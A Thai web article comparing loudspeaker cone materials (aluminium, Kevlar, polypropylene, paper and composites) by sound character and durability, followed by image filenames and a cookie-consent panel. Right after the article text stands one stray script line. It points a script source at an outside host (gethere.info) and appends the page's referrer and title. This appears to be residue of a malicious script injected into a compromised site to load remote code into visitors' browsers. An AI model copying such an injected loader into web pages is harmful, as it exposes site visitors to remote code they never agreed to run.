Select Page

เรื่องของกรวยลำโพง…

เรื่องของกรวยลำโพง…

ลำโพง จะมีบุคลิกเสียงแบบไหนอย่างไร วัสดุที่ใช้ในการผลิตสำคัญมาก ส่วนที่สำคัญอีกชิ้นหนึ่งของลำโพง ก็คือกรวยลำโพง

บุคลิกเสียงจะเด่นในด้านไหน ช่วยให้เสียงเพลงที่ได้ยินออกไปทางใด ก็อยู่ที่กรวยลำโพง ทางผู้ผลิตจึงมักสรรหากรวยลำโพงที่คิดว่าเหมาะสมที่สุดเป็นส่วนในการประกอบ ลำโพง วัสดุแต่ละชนิดมีการเคลื่อนไหว และการหยุดตัวได้แตกต่างกัน จึงตอบสนองความถี่ที่แตกต่างกัน ซึ่งลักษณะของกรวยลำโพงที่มักใช้กันอย่างแพร่หลายก็พอจะสรุปได้ดังนี้…

กรวยลำโพงอลูมินั่ม

20120530033627-728319521

วัสดุประเภทนี้ข้อดีคือมีความคงรูป มีความแข็งแรงทนทานต่ออุณหภูมิมาก แต่ ข้อเสียคือ ถ้าทำไม่ดีน้ำหนักกรวยก็จะมีมาก ทำให้เป็นลำโพงกินวัตต์ บุคลิกเสียงจากกรวยประเภทนี้จะออกไปทางทุ้มกระชับ เก็บตัวดี ไม่สั่นไม่ครางมากนัก สามารถรับกำลังขับจากแอมป์ได้สูง ถ้ากำลังจากแอมป์ไม่ดีพอเสียงก็อาจจะช้า และทำให้การเก็บตัวเป็นไปได้ไม่ดีนัก

กรวยลำโพงเคฟล่า

20120530033629-1342765031

วัสดุประเภทนี้ ข้อดีคือมีน้ำหนักที่เบามากๆ มีความแข็งแรงในระดับที่ดี มีความ คงรูป และมีความยืดหยุ่นเล็กน้อย แต่ด้วยลักษณะของผิวกรวยที่ไม่เรียบ กลับส่งผลให้การสลายคลื่นสั่นค้างด้านหน้ากรวยลำโพงเป็นไปได้ดี ลำโพงที่ผลิตจากวัสดุประเภทนี้มักขับง่าย ไม่กินวัตต์ ช่วยให้ฟังรายละเอียดได้ชัดเจน เสียงที่ได้จะโปร่งสะอาดฟังสบาย ข้อเสียคือ มีการเก็บตัวที่เร็ว และน้ำหนักกรวยที่เบาอาจทำให้ให้เนื้อเสียงขาดเนื้อ ทุ้มออกไปทางกระชับ แต่บางทีก็จะมีปริมาณทุ้มน้อยไปสักหน่อย

กรวยลำโพงโพลีโพรไพลีน

 

20120530033630-1309242515

วัสดุประเภทนี้ เหมือนผลิตขึ้นมาเพื่อนำเอาข้อดีของวัสดุทุกชนิดมารวม กัน คือเบา กำลังดี มีความคงรูปพอสมควร สลายคลื่นสั่นค้างได้ดี ลำโพงขับง่ายไม่กินวัตต์ บุคลิกเสียงจะเปลี่ยนไปตามวัสดุที่ผสม ส่วนใหญ่กรวยชนิดนี้มักให้เสียงทุ้ม และเสียงกลางที่มีความเสมอกัน ทุ้มไม่เด่น ไม่อิ่มใหญ่มากนัก มีความกระชับ เก็บตัวดี มีความนุ่มเล็กน้อย กลางก็ไม่ถึงกับโปร่งโล่งสว่าง มีความราบรื่นนุ่มนวลพอเหมาะ แต่ข้อเสียคือ วัสดุโพลีโพรไพลีนอาจไม่ทนต่อสภาวะการเปลี่ยนแปลงทางอุณหภูมิ กรวยไม่คงรูปบิดงอได้ง่าย

กรวยลำโพงกระดาษ

 

20120530033628-1820606549

วัสดุประเภทนี้ คือแบบอมตะก็น่าจะใช่ มีมาทุกยุคทุกสมัย ข้อดีมากมีมาย ไม่ว่า จะเป็น น้ำหนักที่เบา คงรูปได้ดี สลายคลื่นสั่นค้างได้ดี มีความเพี้ยนต่ำ เพราะทำจากวัสดุธรรวมชาติ ช่วยให้ลำโพงไม่กินวัตต์ ข้อเสียก็น่าจะอยู่ที่ความแข็งแรงที่ไม่เทียบเท่ากรวยวัสดุสังเคราะห์ แต่ในส่วนของบุคลิกเสียง ผู้เล่นส่วนใหญ่ชื่นชอบลำโพงที่ผลิตจากกรวยชนิดนี้ที่เสียงทุ้ม และเสียงกลาง ซึ่งมีความเป็นธรรมชาติสูง ไร้การเติมแต่ง เสียงร้องมีชีวิตชีวาไม่เพิ่มเกินจริง ทุ้มได้น้ำหนัก และมีการแยกน้ำหนักที่ดี ความเพี้ยนต่ำ คุณภาพจะเปลี่ยนไปขึ้นอยู่กับชนิดของน้ำยาที่มาเคลือบตัวกรวยเพื่อเพิ่มความ แข็งแรง

กรวยลำโพงวัสดุผสม

20120530033627-1768664265

ปัจจุบันด้วยเทคโนโลยีการผลิตชั้นสูง มักจะนำวัสดุต่างชนิดมาผลิตกรวยลำโพง เช่น กรวยเคฟล่าห์ผสมความยืดหยุ่นของโฟม, กรวยกระดาษผสมพืชพันธุ์ไม้ และกรวยโลหะที่มีส่วนผสมของวัสดุอีกหลายชนิด เช่น แท่งคาร์บอนที่นำมาบดละเอียดรีดเป็นเส้นเพื่อทำเส้นใยคาร์บอน ซึ่งการใช้ส่วนผสมที่หลากหลายเพื่อให้ได้กรวยลำโพงที่มีการตอบสนองความถี่ใน แบบที่ผู้ผลิตต้องการ

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

honor_jpeg   mb_jpeg   johnnie_jpeg   judge_jpeg   maxma-2_jpeg   konrukdee_jpeg   ma_jpeg   gip_jpeg   exad_jpeg   option_jpeg   adison_jpeg   xcaliber_jpeg   rifle_jpeg   lefven_jpeg   cube_jpeg   kingdom_jpeg   ssf_jpeg   mafia_jpeg   taurus_jpeg

เราใช้คุกกี้เพื่อพัฒนาประสิทธิภาพ และประสบการณ์ที่ดีในการใช้เว็บไซต์ของคุณ คุณสามารถศึกษารายละเอียดได้ที่ นโยบายความเป็นส่วนตัว และสามารถจัดการความเป็นส่วนตัวเองได้ของคุณได้เองโดยคลิกที่ ตั้งค่า

Privacy Preferences

คุณสามารถเลือกการตั้งค่าคุกกี้โดยเปิด/ปิด คุกกี้ในแต่ละประเภทได้ตามความต้องการ ยกเว้น คุกกี้ที่จำเป็น

Allow All
Manage Consent Preferences
  • คุกกี้ที่จำเป็น
    Always Active

    ประเภทของคุกกี้มีความจำเป็นสำหรับการทำงานของเว็บไซต์ เพื่อให้คุณสามารถใช้ได้อย่างเป็นปกติ และเข้าชมเว็บไซต์ คุณไม่สามารถปิดการทำงานของคุกกี้นี้ในระบบเว็บไซต์ของเราได้

  • คุกกี้เพื่อการวิเคราะห์

    คุกกี้ประเภทนี้จะทำการเก็บข้อมูลการใช้งานเว็บไซต์ของคุณ เพื่อเป็นประโยชน์ในการวัดผล ปรับปรุง และพัฒนาประสบการณ์ที่ดีในการใช้งานเว็บไซต์ ถ้าหากท่านไม่ยินยอมให้เราใช้คุกกี้นี้ เราจะไม่สามารถวัดผล ปรับปรุงและพัฒนาเว็บไซต์ได้

Save
%d bloggers like this: